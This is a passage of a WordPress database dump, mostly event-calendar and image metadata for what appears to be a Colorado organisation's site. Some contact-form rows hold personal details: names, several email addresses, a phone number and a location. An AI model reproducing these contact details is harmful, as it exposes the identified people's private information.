Springs\";}'),(128840,263456,'_field_228','US'),(128839,263456,'_field_227','CO'),(128838,263456,'_field_226','lynnzies3@gmail.com'),(128837,263456,'_field_225','SUTTON'),(160535,266604,'mec_countdown_method','global'),(160534,266604,'mec_timezone','global'),(128777,32074,'passster_protection_type','password'),(160532,266604,'mec_hide_end_time','0'),(160533,266604,'mec_comment',''),(160531,266604,'mec_hide_time','0'),(160530,266604,'one_occurrence','0'),(160529,266604,'mec_allday','0'),(127403,263404,'_RTEClimitRegistrations','0'),(126509,263379,'_EventStartDate','2022-02-06 10:30:00'),(126510,263379,'_EventStartDateUTC','2022-02-06 17:30:00'),(126511,263379,'_EventEndDate','2022-02-06 12:00:00'),(126278,263372,'_EventStartDate','2021-07-04 10:30:00'),(126179,263369,'_EventStartDate','2021-04-04 10:30:00'),(126180,263369,'_EventStartDateUTC','2021-04-04 16:30:00'),(126181,263369,'_EventEndDate','2021-04-04 12:00:00'),(126182,263369,'_EventEndDateUTC','2021-04-04 18:00:00'),(126183,263369,'_EventDuration','5400'),(128505,263369,'_EventOrigin','events-calendar'),(128504,263369,'_EventOrigin','events-calendar'),(128507,263369,'_RTECregistrationsDisabled','1'),(128508,263369,'_RTECdeadlineType','start'),(128509,263369,'_RTECwhoCanRegister','any'),(128510,263369,'_RTEClimitRegistrations','0'),(128511,263369,'_RTECmaxRegistrations','30'),(128512,263369,'boldgrid_hide_page_title','0'),(128513,263369,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2022-02-06\";s:14:\"EventStartDate\";s:19:\"2021-03-07 10:30:00\";s:12:\"EventEndDate\";s:19:\"2021-03-07 12:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(128514,263369,'_EventShowMapLink','1'),(128515,263369,'_EventShowMap','1'),(126212,263370,'_EventStartDate','2021-05-02 10:30:00'),(126213,263370,'_EventStartDateUTC','2021-05-02 16:30:00'),(126214,263370,'_EventEndDate','2021-05-02 12:00:00'),(126215,263370,'_EventEndDateUTC','2021-05-02 18:00:00'),(126216,263370,'_EventDuration','5400'),(128524,263370,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635271;s:12:\"_EventOrigin\";i:1610635271;s:13:\"_thumbnail_id\";i:1610635271;s:26:\"_RTECregistrationsDisabled\";i:1610635271;s:17:\"_RTECdeadlineType\";i:1610635271;s:19:\"_RTECwhoCanRegister\";i:1610635271;s:23:\"_RTEClimitRegistrations\";i:1610635271;s:21:\"_RTECmaxRegistrations\";i:1610635271;s:24:\"boldgrid_hide_page_title\";i:1610635271;s:16:\"_EventRecurrence\";i:1610635271;s:17:\"_EventShowMapLink\";i:1610635271;s:13:\"_EventShowMap\";i:1610635271;s:13:\"_EventVenueID\";i:1610635271;s:20:\"_EventCurrencySymbol\";i:1610635271;s:22:\"_EventCurrencyPosition\";i:1610635271;s:10:\"_EventCost\";i:1610635271;s:9:\"_EventURL\";i:1610635271;s:14:\"_EventTimezone\";i:1610635271;s:12:\"_dp_original\";i:1610635271;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635271;s:16:\"tribe_events_cat\";i:1610660471;}'),(128525,263370,'protect_children',''),(128526,263370,'protect_children',''),(128527,263370,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635271;s:12:\"_EventOrigin\";i:1610635271;s:13:\"_thumbnail_id\";i:1610635271;s:26:\"_RTECregistrationsDisabled\";i:1610635271;s:17:\"_RTECdeadlineType\";i:1610635271;s:19:\"_RTECwhoCanRegister\";i:1610635271;s:23:\"_RTEClimitRegistrations\";i:1610635271;s:21:\"_RTECmaxRegistrations\";i:1610635271;s:24:\"boldgrid_hide_page_title\";i:1610635271;s:16:\"_EventRecurrence\";i:1610635271;s:17:\"_EventShowMapLink\";i:1610635271;s:13:\"_EventShowMap\";i:1610635271;s:13:\"_EventVenueID\";i:1610635271;s:20:\"_EventCurrencySymbol\";i:1610635271;s:22:\"_EventCurrencyPosition\";i:1610635271;s:10:\"_EventCost\";i:1610635271;s:9:\"_EventURL\";i:1610635271;s:14:\"_EventTimezone\";i:1610635271;s:12:\"_dp_original\";i:1610635271;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635271;s:16:\"tribe_events_cat\";i:1610660471;}'),(126245,263371,'_EventStartDate','2021-06-06 10:30:00'),(126246,263371,'_EventStartDateUTC','2021-06-06 16:30:00'),(126247,263371,'_EventEndDate','2021-06-06 12:00:00'),(126248,263371,'_EventEndDateUTC','2021-06-06 18:00:00'),(126249,263371,'_EventDuration','5400'),(129861,263590,'_EventOrigin','events-calendar'),(129859,263590,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1611953568;s:12:\"_EventOrigin\";i:1611953568;s:13:\"_thumbnail_id\";i:1611953568;s:26:\"_RTECregistrationsDisabled\";i:1611953568;s:17:\"_RTECdeadlineType\";i:1611953568;s:19:\"_RTECwhoCanRegister\";i:1611953568;s:23:\"_RTEClimitRegistrations\";i:1611953568;s:21:\"_RTECmaxRegistrations\";i:1611953568;s:24:\"boldgrid_hide_page_title\";i:1611953568;s:16:\"_EventRecurrence\";i:1611953568;s:17:\"_EventShowMapLink\";i:1611953568;s:13:\"_EventShowMap\";i:1611953568;s:20:\"_EventCurrencySymbol\";i:1611953568;s:22:\"_EventCurrencyPosition\";i:1611953568;s:10:\"_EventCost\";i:1611953568;s:9:\"_EventURL\";i:1611953568;s:14:\"_EventTimezone\";i:1611953568;s:12:\"_dp_original\";i:1611953568;s:13:\"_EventVenueID\";i:1611953568;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1611953568;}'),(129273,263590,'_EventEndDateUTC','2021-03-20 23:00:00'),(129274,263590,'_EventDuration','3600'),(126016,263362,'_edit_lock','1619131450:2'),(126017,263362,'_edit_last','2'),(126019,263362,'_RTECregistrationsDisabled','1'),(126020,263362,'_RTECdeadlineType','start'),(126021,263362,'_RTECwhoCanRegister','any'),(126022,263362,'_RTEClimitRegistrations','0'),(126023,263362,'_RTECmaxRegistrations','30'),(126024,263362,'boldgrid_hide_page_title','0'),(128827,263454,'_seq_num','18'),(128826,263454,'_form_id','10'),(128825,263454,'_field_105','I would like to update my email address to kimberlyyoung@protonmail.com for all ECK communications. Thank you! :-)'),(128824,263454,'_field_104','Communication Coordinator'),(128823,263454,'_field_101','Denver'),(128822,263454,'_field_100','(925) 596-1696'),(128836,263456,'_field_224','LYNNZIE'),(126038,263362,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(126039,263362,'_EventShowMapLink','1'),(126040,263362,'_EventShowMap','1'),(126041,263362,'_EventVenueID','262305'),(126042,263362,'_EventStartDate','2021-01-14 08:00:00'),(126043,263362,'_EventEndDate','2021-01-14 17:00:00'),(126044,263362,'_EventStartDateUTC','2021-01-14 15:00:00'),(126045,263362,'_EventEndDateUTC','2021-01-15 00:00:00'),(126046,263362,'_EventDuration','32400'),(126047,263362,'_EventCurrencySymbol',''),(126048,263362,'_EventCurrencyPosition','prefix'),(126049,263362,'_EventCost',''),(126050,263362,'_EventURL',''),(126051,263362,'_EventTimezone','America/Denver'),(126052,263362,'_EventTimezoneAbbr','MST'),(126053,263364,'protect_children',''),(126054,263364,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1610631050;s:12:\"_EventOrigin\";i:1610631050;s:13:\"_thumbnail_id\";i:1610631050;s:26:\"_RTECregistrationsDisabled\";i:1610631050;s:17:\"_RTECdeadlineType\";i:1610631050;s:19:\"_RTECwhoCanRegister\";i:1610631050;s:23:\"_RTEClimitRegistrations\";i:1610631050;s:21:\"_RTECmaxRegistrations\";i:1610631050;s:24:\"boldgrid_hide_page_title\";i:1610631050;s:16:\"_EventRecurrence\";i:1610631531;s:17:\"_EventShowMapLink\";i:1610631050;s:13:\"_EventShowMap\";i:1610631050;s:13:\"_EventVenueID\";i:1610631050;s:15:\"_EventStartDate\";i:1610631531;s:13:\"_EventEndDate\";i:1610631531;s:18:\"_EventStartDateUTC\";i:1610631531;s:16:\"_EventEndDateUTC\";i:1610631531;s:14:\"_EventDuration\";i:1610631531;s:20:\"_EventCurrencySymbol\";i:1610631050;s:22:\"_EventCurrencyPosition\";i:1610631050;s:10:\"_EventCost\";i:1610631050;s:9:\"_EventURL\";i:1610631050;s:14:\"_EventTimezone\";i:1610631050;s:18:\"_EventTimezoneAbbr\";i:1610631050;s:12:\"_dp_original\";i:1610631050;s:10:\"_edit_last\";i:1610631120;s:10:\"post_title\";i:1610631120;s:12:\"post_content\";i:1610631531;s:16:\"tribe_events_cat\";i:1610660435;s:11:\"post_status\";i:1610631531;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635235;}'),(126055,263364,'_EventOrigin','events-calendar'),(126056,263364,'protect_children',''),(126057,263364,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1610631050;s:12:\"_EventOrigin\";i:1610631050;s:13:\"_thumbnail_id\";i:1610631050;s:26:\"_RTECregistrationsDisabled\";i:1610631050;s:17:\"_RTECdeadlineType\";i:1610631050;s:19:\"_RTECwhoCanRegister\";i:1610631050;s:23:\"_RTEClimitRegistrations\";i:1610631050;s:21:\"_RTECmaxRegistrations\";i:1610631050;s:24:\"boldgrid_hide_page_title\";i:1610631050;s:16:\"_EventRecurrence\";i:1610631531;s:17:\"_EventShowMapLink\";i:1610631050;s:13:\"_EventShowMap\";i:1610631050;s:13:\"_EventVenueID\";i:1610631050;s:15:\"_EventStartDate\";i:1610631531;s:13:\"_EventEndDate\";i:1610631531;s:18:\"_EventStartDateUTC\";i:1610631531;s:16:\"_EventEndDateUTC\";i:1610631531;s:14:\"_EventDuration\";i:1610631531;s:20:\"_EventCurrencySymbol\";i:1610631050;s:22:\"_EventCurrencyPosition\";i:1610631050;s:10:\"_EventCost\";i:1610631050;s:9:\"_EventURL\";i:1610631050;s:14:\"_EventTimezone\";i:1610631050;s:18:\"_EventTimezoneAbbr\";i:1610631050;s:12:\"_dp_original\";i:1610631050;s:10:\"_edit_last\";i:1610631120;s:10:\"post_title\";i:1610631120;s:12:\"post_content\";i:1610631531;s:16:\"tribe_events_cat\";i:1610660435;s:11:\"post_status\";i:1610631531;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635235;}'),(126060,263364,'_RTECregistrationsDisabled','1'),(126061,263364,'_RTECdeadlineType','start'),(126062,263364,'_RTECwhoCanRegister','any'),(126063,263364,'_RTEClimitRegistrations','0'),(126064,263364,'_RTECmaxRegistrations','30'),(126058,263364,'_EventOrigin','events-calendar'),(126065,263364,'boldgrid_hide_page_title','0'),(126066,263364,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-02-07\";s:14:\"EventStartDate\";s:19:\"2021-01-03 10:30:00\";s:12:\"EventEndDate\";s:19:\"2021-01-03 12:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(126067,263364,'_EventShowMapLink','1'),(126068,263364,'_EventShowMap','1'),(126069,263364,'_EventVenueID','262305'),(126070,263364,'_EventStartDate','2021-01-03 10:30:00'),(126071,263364,'_EventEndDate','2021-01-03 12:00:00'),(126072,263364,'_EventStartDateUTC','2021-01-03 17:30:00'),(126073,263364,'_EventEndDateUTC','2021-01-03 19:00:00'),(126074,263364,'_EventDuration','5400'),(126075,263364,'_EventCurrencySymbol',''),(126076,263364,'_EventCurrencyPosition','prefix'),(118589,262909,'_RTECwhoCanRegister','any'),(118590,262909,'_RTEClimitRegistrations','0'),(118591,262909,'_RTECmaxRegistrations','30'),(118592,262909,'boldgrid_hide_page_title','0'),(118593,262909,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-03\";s:14:\"EventStartDate\";s:19:\"2020-12-06 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-06 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(118585,262909,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513875;s:12:\"_EventOrigin\";i:1607513875;s:26:\"_RTECregistrationsDisabled\";i:1607513875;s:17:\"_RTECdeadlineType\";i:1607513875;s:19:\"_RTECwhoCanRegister\";i:1607513875;s:23:\"_RTEClimitRegistrations\";i:1607513875;s:21:\"_RTECmaxRegistrations\";i:1607513875;s:24:\"boldgrid_hide_page_title\";i:1607513875;s:16:\"_EventRecurrence\";i:1607513875;s:17:\"_EventShowMapLink\";i:1607513875;s:13:\"_EventShowMap\";i:1607513875;s:13:\"_EventVenueID\";i:1607513875;s:20:\"_EventCurrencySymbol\";i:1607513875;s:22:\"_EventCurrencyPosition\";i:1607513875;s:10:\"_EventCost\";i:1607513875;s:9:\"_EventURL\";i:1607513875;s:14:\"_EventTimezone\";i:1607513875;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513875;s:13:\"_thumbnail_id\";i:1607513875;}'),(118639,262911,'_EventCurrencySymbol',''),(118640,262911,'_EventCurrencyPosition','prefix'),(118641,262911,'_EventCost',''),(118642,262911,'_EventURL',''),(117826,262910,'_EventStartDate','2021-02-07 09:00:00'),(117827,262910,'_EventStartDateUTC','2021-02-07 16:00:00'),(117828,262910,'_EventEndDate','2021-02-07 10:15:00'),(118643,262911,'_EventTimezone','America/Denver'),(117829,262910,'_EventEndDateUTC','2021-02-07 17:15:00'),(117830,262910,'_EventDuration','4500'),(118836,262954,'_RTECregistrationsDisabled','1'),(118606,262910,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513875;s:12:\"_EventOrigin\";i:1607513875;s:26:\"_RTECregistrationsDisabled\";i:1607513875;s:17:\"_RTECdeadlineType\";i:1607513875;s:19:\"_RTECwhoCanRegister\";i:1607513875;s:23:\"_RTEClimitRegistrations\";i:1607513875;s:21:\"_RTECmaxRegistrations\";i:1607513875;s:24:\"boldgrid_hide_page_title\";i:1607513875;s:16:\"_EventRecurrence\";i:1607513875;s:17:\"_EventShowMapLink\";i:1607513875;s:13:\"_EventShowMap\";i:1607513875;s:13:\"_EventVenueID\";i:1607513875;s:20:\"_EventCurrencySymbol\";i:1607513875;s:22:\"_EventCurrencyPosition\";i:1607513875;s:10:\"_EventCost\";i:1607513875;s:9:\"_EventURL\";i:1607513875;s:14:\"_EventTimezone\";i:1607513875;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513875;s:13:\"_thumbnail_id\";i:1607513875;}'),(118608,262910,'_RTECregistrationsDisabled','1'),(118609,262910,'_RTECdeadlineType','start'),(118610,262910,'_RTECwhoCanRegister','any'),(118611,262910,'_RTEClimitRegistrations','0'),(118612,262910,'_RTECmaxRegistrations','30'),(118613,262910,'boldgrid_hide_page_title','0'),(118607,262910,'_EventOrigin','events-calendar'),(118624,262910,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262909;a:2:{s:9:\"timestamp\";i:1609664400;s:8:\"duration\";i:4500;}i:262910;a:2:{s:9:\"timestamp\";i:1612688400;s:8:\"duration\";i:4500;}i:262911;a:2:{s:9:\"timestamp\";i:1615107600;s:8:\"duration\";i:4500;}i:262912;a:2:{s:9:\"timestamp\";i:1617526800;s:8:\"duration\";i:4500;}i:262913;a:2:{s:9:\"timestamp\";i:1619946000;s:8:\"duration\";i:4500;}i:262914;a:2:{s:9:\"timestamp\";i:1622970000;s:8:\"duration\";i:4500;}i:262915;a:2:{s:9:\"timestamp\";i:1625389200;s:8:\"duration\";i:4500;}i:262916;a:2:{s:9:\"timestamp\";i:1627808400;s:8:\"duration\";i:4500;}i:262917;a:2:{s:9:\"timestamp\";i:1630832400;s:8:\"duration\";i:4500;}i:262918;a:2:{s:9:\"timestamp\";i:1633251600;s:8:\"duration\";i:4500;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(118621,262910,'_EventURL',''),(118622,262910,'_EventTimezone','America/Denver'),(118614,262910,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-03\";s:14:\"EventStartDate\";s:19:\"2020-12-06 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-06 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(118615,262910,'_EventShowMapLink','1'),(118616,262910,'_EventShowMap','1'),(118617,262910,'_EventVenueID','262507'),(118618,262910,'_EventCurrencySymbol',''),(118619,262910,'_EventCurrencyPosition','prefix'),(118620,262910,'_EventCost',''),(118645,262911,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262909;a:2:{s:9:\"timestamp\";i:1609664400;s:8:\"duration\";i:4500;}i:262910;a:2:{s:9:\"timestamp\";i:1612688400;s:8:\"duration\";i:4500;}i:262911;a:2:{s:9:\"timestamp\";i:1615107600;s:8:\"duration\";i:4500;}i:262912;a:2:{s:9:\"timestamp\";i:1617526800;s:8:\"duration\";i:4500;}i:262913;a:2:{s:9:\"timestamp\";i:1619946000;s:8:\"duration\";i:4500;}i:262914;a:2:{s:9:\"timestamp\";i:1622970000;s:8:\"duration\";i:4500;}i:262915;a:2:{s:9:\"timestamp\";i:1625389200;s:8:\"duration\";i:4500;}i:262916;a:2:{s:9:\"timestamp\";i:1627808400;s:8:\"duration\";i:4500;}i:262917;a:2:{s:9:\"timestamp\";i:1630832400;s:8:\"duration\";i:4500;}i:262918;a:2:{s:9:\"timestamp\";i:1633251600;s:8:\"duration\";i:4500;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(117855,262911,'_EventStartDate','2021-03-07 09:00:00'),(117856,262911,'_EventStartDateUTC','2021-03-07 16:00:00'),(117857,262911,'_EventEndDate','2021-03-07 10:15:00'),(117858,262911,'_EventEndDateUTC','2021-03-07 17:15:00'),(118838,262954,'_RTECwhoCanRegister','any'),(117859,262911,'_EventDuration','4500'),(118837,262954,'_RTECdeadlineType','start'),(118627,262911,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513875;s:12:\"_EventOrigin\";i:1607513875;s:26:\"_RTECregistrationsDisabled\";i:1607513875;s:17:\"_RTECdeadlineType\";i:1607513875;s:19:\"_RTECwhoCanRegister\";i:1607513875;s:23:\"_RTEClimitRegistrations\";i:1607513875;s:21:\"_RTECmaxRegistrations\";i:1607513875;s:24:\"boldgrid_hide_page_title\";i:1607513875;s:16:\"_EventRecurrence\";i:1607513875;s:17:\"_EventShowMapLink\";i:1607513875;s:13:\"_EventShowMap\";i:1607513875;s:13:\"_EventVenueID\";i:1607513875;s:20:\"_EventCurrencySymbol\";i:1607513875;s:22:\"_EventCurrencyPosition\";i:1607513875;s:10:\"_EventCost\";i:1607513875;s:9:\"_EventURL\";i:1607513875;s:14:\"_EventTimezone\";i:1607513875;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513875;s:13:\"_thumbnail_id\";i:1607513875;}'),(118634,262911,'boldgrid_hide_page_title','0'),(169102,267185,'mec_repeat_interval','1'),(169101,267185,'mec_repeat_type',''),(169099,267185,'mec_end_day_seconds','72000'),(169100,267185,'mec_repeat_status','0'),(169097,267185,'mec_end_time_minutes','0'),(169098,267185,'mec_end_time_ampm','PM'),(169096,267185,'mec_end_time_hour','8'),(169095,267185,'mec_end_date','2022-09-20'),(169094,267185,'mec_start_day_seconds','68400'),(92745,261620,'_field_134','Gorpe'),(125460,263329,'_EventOrigin','events-calendar'),(125461,263329,'_EventOrigin','events-calendar'),(125463,263329,'_RTECregistrationsDisabled','1'),(125464,263329,'_RTECdeadlineType','start'),(125465,263329,'_RTECwhoCanRegister','any'),(125455,263329,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610630421;s:12:\"_EventOrigin\";i:1610630421;s:13:\"_thumbnail_id\";i:1610630421;s:26:\"_RTECregistrationsDisabled\";i:1610630421;s:17:\"_RTECdeadlineType\";i:1610630421;s:19:\"_RTECwhoCanRegister\";i:1610630421;s:23:\"_RTEClimitRegistrations\";i:1610630421;s:21:\"_RTECmaxRegistrations\";i:1610630421;s:24:\"boldgrid_hide_page_title\";i:1610630421;s:16:\"_EventRecurrence\";i:1610630421;s:17:\"_EventShowMapLink\";i:1610630421;s:13:\"_EventShowMap\";i:1610630421;s:13:\"_EventVenueID\";i:1610630421;s:20:\"_EventCurrencySymbol\";i:1610630421;s:22:\"_EventCurrencyPosition\";i:1610630421;s:10:\"_EventCost\";i:1610630421;s:9:\"_EventURL\";i:1610630421;s:14:\"_EventTimezone\";i:1610630421;s:12:\"_dp_original\";i:1610630421;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610630421;s:16:\"tribe_events_cat\";i:1610655621;}'),(151724,266078,'mec_organizer_id','1'),(151706,266077,'_wp_attached_file','2021/12/generic-event-6-2.jpg'),(151707,266077,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:719;s:6:\"height\";i:385;s:4:\"file\";s:29:\"2021/12/generic-event-6-2.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"generic-event-6-2-300x161.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:161;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"generic-event-6-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:29:\"generic-event-6-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:29:\"generic-event-6-2-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:29:\"generic-event-6-2-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:29:\"generic-event-6-2-300x385.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"generic-event-6-2-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(151708,266076,'original-file','2021/12/generic-event-6-1-updraft-pre-smush-original.jpg'),(151709,266076,'smush-complete','1'),(151710,266076,'smush-info','The file was compressed from 91.33 KB to 86.32 KB saving 5.49 percent using WP-Optimize'),(151711,266076,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:93526;s:12:\"smushed-size\";i:88389;s:15:\"savings-percent\";d:5.4900000000000002131628207280300557613372802734375;}'),(151712,266075,'original-file','2021/12/generic-event-6-updraft-pre-smush-original.jpg'),(151713,266075,'smush-complete','1'),(151714,266075,'smush-info','The file was compressed from 91.33 KB to 86.32 KB saving 5.49 percent using WP-Optimize'),(151715,266075,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:93526;s:12:\"smushed-size\";i:88389;s:15:\"savings-percent\";d:5.4900000000000002131628207280300557613372802734375;}'),(151716,266077,'original-file','2021/12/generic-event-6-2-updraft-pre-smush-original.jpg'),(151717,266077,'smush-complete','1'),(151718,266077,'smush-info','The file was compressed from 91.33 KB to 86.32 KB saving 5.49 percent using WP-Optimize'),(151719,266077,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:93526;s:12:\"smushed-size\";i:88389;s:15:\"savings-percent\";d:5.4900000000000002131628207280300557613372802734375;}'),(151720,266078,'protect_children',''),(151721,266078,'mec_color',''),(151722,266078,'mec_location_id','118'),(151723,266078,'mec_dont_show_map','0'),(115731,262795,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511404;s:12:\"_EventOrigin\";i:1607511404;s:13:\"_thumbnail_id\";i:1607511404;s:26:\"_RTECregistrationsDisabled\";i:1607511404;s:17:\"_RTECdeadlineType\";i:1607511404;s:19:\"_RTECwhoCanRegister\";i:1607511404;s:23:\"_RTEClimitRegistrations\";i:1607511404;s:21:\"_RTECmaxRegistrations\";i:1607511404;s:24:\"boldgrid_hide_page_title\";i:1607511404;s:16:\"_EventRecurrence\";i:1607511404;s:17:\"_EventShowMapLink\";i:1607511404;s:13:\"_EventShowMap\";i:1607511404;s:13:\"_EventVenueID\";i:1607511404;s:20:\"_EventCurrencySymbol\";i:1607511404;s:22:\"_EventCurrencyPosition\";i:1607511404;s:10:\"_EventCost\";i:1607511404;s:9:\"_EventURL\";i:1607511404;s:14:\"_EventTimezone\";i:1607511404;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511404;s:16:\"tribe_events_cat\";i:1607536604;}'),(114602,262796,'_EventStartDate','2021-06-20 09:00:00'),(115768,262796,'_EventCurrencyPosition','prefix'),(114603,262796,'_EventStartDateUTC','2021-06-20 15:00:00'),(114604,262796,'_EventEndDate','2021-06-20 10:10:00'),(120891,263177,'_EventCurrencyPosition','prefix'),(106534,262570,'_field_353','Test'),(106535,262570,'_field_354','Testing'),(106536,262570,'_field_355','choll.03@comcast.net'),(106537,262570,'_field_357','This is a test'),(106538,262570,'_field_358','Test for sp svc contact'),(106539,262570,'_form_id','38'),(106540,262570,'_seq_num','1'),(106541,262513,'popup_conversion_count_total','2'),(106542,262513,'popup_last_conversion','1609772142'),(146787,265639,'passster_activate_global_protection',NULL),(141068,264874,'_wp_attached_file','2021/05/fb-icon-email.png'),(141069,264874,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:53;s:6:\"height\";i:53;s:4:\"file\";s:25:\"2021/05/fb-icon-email.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(151836,266081,'mec_in_days',''),(151835,266081,'mec_advanced_days','a:0:{}'),(151833,266081,'mec_repeat_end_at_occurrences',''),(151834,266081,'mec_repeat_end_at_date',''),(151829,266081,'mec_repeat_status','0'),(151830,266081,'mec_repeat_type',''),(151831,266081,'mec_repeat_interval','1'),(151832,266081,'mec_repeat_end',''),(151747,266078,'mec_start_time_ampm','PM'),(151746,266078,'mec_start_time_minutes','0'),(151745,266078,'mec_start_time_hour','3'),(151741,266078,'mec_timezone','global'),(151742,266078,'mec_countdown_method','global'),(151743,266078,'mec_public','1'),(151744,266078,'mec_start_date','2021-12-20'),(151739,266078,'mec_hide_end_time','0'),(151740,266078,'mec_comment',''),(151738,266078,'mec_hide_time','0'),(151736,266078,'mec_allday','0'),(151737,266078,'one_occurrence','0'),(151735,266078,'mec_certain_weekdays','a:0:{}'),(151734,266078,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";